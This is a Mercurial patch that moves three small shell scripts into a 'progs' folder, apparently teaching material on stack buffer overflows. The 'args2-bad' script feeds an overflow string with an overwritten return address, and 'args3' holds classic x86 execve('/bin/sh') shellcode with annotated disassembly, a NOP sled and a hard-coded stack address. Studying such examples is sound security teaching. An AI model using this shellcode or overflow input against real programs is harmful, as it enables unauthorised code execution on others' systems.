# HG changeset patch # User Christian Urban # Date 1412432192 -3600 # Node ID f7a9837a63b83e2a6b2472dc94ecdc4732d7baa3 # Parent 17852f5397fdd19faa43219109d7758c3a75bfd3 moved arguments back diff -r 17852f5397fd -r f7a9837a63b8 Attic/programs/args2-bad --- a/Attic/programs/args2-bad Sat Oct 04 15:07:26 2014 +0100 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,3 +0,0 @@ -#!/bin/sh - -perl -e 'print "test\nAAAAAAAABBBB\xc8\x84\x04\x08\n"' \ No newline at end of file diff -r 17852f5397fd -r f7a9837a63b8 Attic/programs/args2-good --- a/Attic/programs/args2-good Sat Oct 04 15:07:26 2014 +0100 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,3 +0,0 @@ -#!/bin/sh - -perl -e 'print "test\ntest\n"' \ No newline at end of file diff -r 17852f5397fd -r f7a9837a63b8 Attic/programs/args3 --- a/Attic/programs/args3 Sat Oct 04 15:07:26 2014 +0100 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,28 +0,0 @@ -#!/bin/sh - -# shellscript that overwrites the buffer with -# some payload for opening a shell (the payload -# cannot contain any \x00) - - -shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" - -# 24 bytes of shellcode - -# "\x31\xc0" // xorl %eax,%eax -# "\x50" // pushl %eax -# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e -# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f -# "\x89\xe3" // movl %esp,%ebx -# "\x99" // cltd -# "\x52" // pushl %edx -# "\x53" // pushl %ebx -# "\x89\xe1" // movl %esp,%ecx -# "\xb0\x0b" // movb $0xb,%al -# "\xcd\x80" // int $0x80 - -padding=`perl -e 'print "\x90" x 80'` - -# need s correct address in order to run -printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" - diff -r 17852f5397fd -r f7a9837a63b8 progs/args2-bad --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/args2-bad Sat Oct 04 15:16:32 2014 +0100 @@ -0,0 +1,3 @@ +#!/bin/sh + +perl -e 'print "test\nAAAAAAAABBBB\xc8\x84\x04\x08\n"' \ No newline at end of file diff -r 17852f5397fd -r f7a9837a63b8 progs/args2-good --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/args2-good Sat Oct 04 15:16:32 2014 +0100 @@ -0,0 +1,3 @@ +#!/bin/sh + +perl -e 'print "test\ntest\n"' \ No newline at end of file diff -r 17852f5397fd -r f7a9837a63b8 progs/args3 --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/args3 Sat Oct 04 15:16:32 2014 +0100 @@ -0,0 +1,28 @@ +#!/bin/sh + +# shellscript that overwrites the buffer with +# some payload for opening a shell (the payload +# cannot contain any \x00) + + +shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" + +# 24 bytes of shellcode + +# "\x31\xc0" // xorl %eax,%eax +# "\x50" // pushl %eax +# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e +# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f +# "\x89\xe3" // movl %esp,%ebx +# "\x99" // cltd +# "\x52" // pushl %edx +# "\x53" // pushl %ebx +# "\x89\xe1" // movl %esp,%ecx +# "\xb0\x0b" // movb $0xb,%al +# "\xcd\x80" // int $0x80 + +padding=`perl -e 'print "\x90" x 80'` + +# need s correct address in order to run +printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" +